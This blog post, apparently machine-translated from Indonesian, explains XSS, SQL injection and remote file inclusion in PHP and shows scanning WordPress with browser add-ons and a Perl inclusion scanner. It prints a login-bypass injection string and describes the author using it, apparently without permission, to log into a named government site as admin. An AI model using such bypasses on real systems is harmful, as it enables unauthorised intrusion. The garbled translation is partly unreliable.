Once completed php script we have made there are times when bugs unwanted fester on the sidelines of the script is ready dionlinekan. And of course this bug can be fatal so it can be used by the intruders in an automated intruders in an automated, which seeks to exploit the system.
And who would have thought that php script that has been made safe from vulnerabilities in security issues. : D ~ ~ ~
Then, how to prevent the hackers exploit, and even damage your website, how to prevent and find out exactly what has created the script has a fatal bug, how to handle it all?? : D
Before we move forward to the next step is a good idea to identify the most popular bugs often diexploitasi.
The author will try to give some explanations, bug often found in web-based applications in particular Content Management System and others. Among them:
- XSS (Cross Site Scripting)
- SQL Injection
- RFI (Remote File Inclusion)
Cross Site Scriping
Better known as XSS. This error occurred because there was no filtering of html and java script.
But basically Defacing (content changes) occur only client side only. The most fatal of this bug is that you can steal cookies and then use it to do something that ... : D ~ ~
Examples:
Sensored [sorry]
SQL Injection
SQL Injection is happening because an attacker who tried to inject sql query via the form or via the address bar in Internet browser. For example when the author tried to login as admin in the South Sumatra government site (http://www.sumsel.go.id). By using the query 'or 1 = 1 - the author was successful login. In essence 'or a single quote and or 1 = 1 - it serves to confuse the sql server, so that by sql server is running the query "select *". What happens is that the author passed to login as admin.
Here is a picture of the author when the author managed to capture login as admin to the site http://www.sumsel.go.id
This picture was taken before the author contacted via email to the webmaster mempatch script phpnya.
RFI (Remote File Inclusion)
Previously, please read the article functions require, require_once, include, and RFI own include_one error occurred because a programmer when doing coding, ie using the variables in these functions. When users enter the URL of his evil script in the variables used in require or include function, it is the evil script can be executed remotely, in other words, the attacker can run commands on your server for the change of site content or even damage it. : D ~ ~
For example please look in the www.milw0rm.com: D ~
Remote File Inclusion Keywordnya. : D ~
Checking BUG
Checking the bug itself can be done manually. Hmmm ... This course will take a lot of time. Tools that can be formed quickly and automatically find bugs stuck in php script by accident or deliberately. : D ~
Basically to check the bug can be done online or offline. Authors suggest that this bug checking done on your localhost (offline) only.
Check XSS Bug
Tools to check the php script XSS on your property is a mozilla firefox addons available for free. Penginstallannya was classified as easy, here is how to use it.
These tools can be downloaded here:
http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi
Check SQL Injection Bug
For the current period with SQL Injection Defacing ranked the most favorite and certainly the most widely used, perhaps because the attacks are carried out fairly easy, just have a basic knowledge of sql syntax. Once again a mozilla firefox addons are quite powerful and easy to use have been provided to conduct a check sql injection bugs. : D
You can download it here:
http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi
Its use was not too difficult.
Check BUG Remote File Inclusion
Previously you first download here scriptnya http://www.newhack.org/dl_jump.php?id
After that, please download active perl, the interpreter is compiler will be used to run scripts inclusionscanner.pl.
And then it inclusionscanner.pl copykan to the directory c: \ perl \ bin
The next step:
1. Enter your script that will scan into a directory in c: \ perl php.
ex: c: \ perl \ wordpress.
2. Log into the command prompt, Start | Run | cmd | enter
3. After that go into the directory c: \ perl \ bin, cd c: \ perl \ bin
4. Run scriptnya,
C: \ Perl \ bin> perl.exe inclusionscanner.pl
# Will check a directory for all includes and unsets
# Coded by Ironfist (ironsecurity.nl)
# Usage: Create a folder in your perlfolder and put the files to be scanned in it
, Next type the folder name below (eg myfolder)
# Gives Errors Checking WHEN subfolders: Ignore THEM Smile
Directory to read? c: \ perl \ wp
then see the results in c: \ perl \ bin \ result.html
The following scan results when the author tries to do the check-inclusion on wordpress 2.3.3:
FOUND: require_once ($ locale_file);
in c: \ perl \ wp / wp-settings.php FOUND: require_once ($ import_root. '/'. $ file);
in c: \ perl \ wp / wp-admin / import.php FOUND: include_once ($ this-> PluginDir. "class-smtp.php");
in c: \ perl \ wp / wp-includes / class-phpmailer.php FOUND: include ($ lang_path. "phpmailer.lang-'. $ lang_type.'. php ');
in c: \ perl \ wp / wp-includes / class-phpmailer.php FOUND: include ($ lang_path. "phpmailer.lang-en.php ');
in c: \ perl \ wp / wp-includes / class-phpmailer.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: include ($ template);
in c: \ perl \ wp / wp-includes / template-loader.php FOUND: require_once ($ _template_file);
in c: \ perl \ wp / wp-includes / theme.php
woww! : D ~ ~ please exploitable in the patch script uh yours. : D ~ ~
Remember, no damage, do not do vandals, if you find bugs in other sites as I have mentioned above, please let the
Tidak ada komentar:
Posting Komentar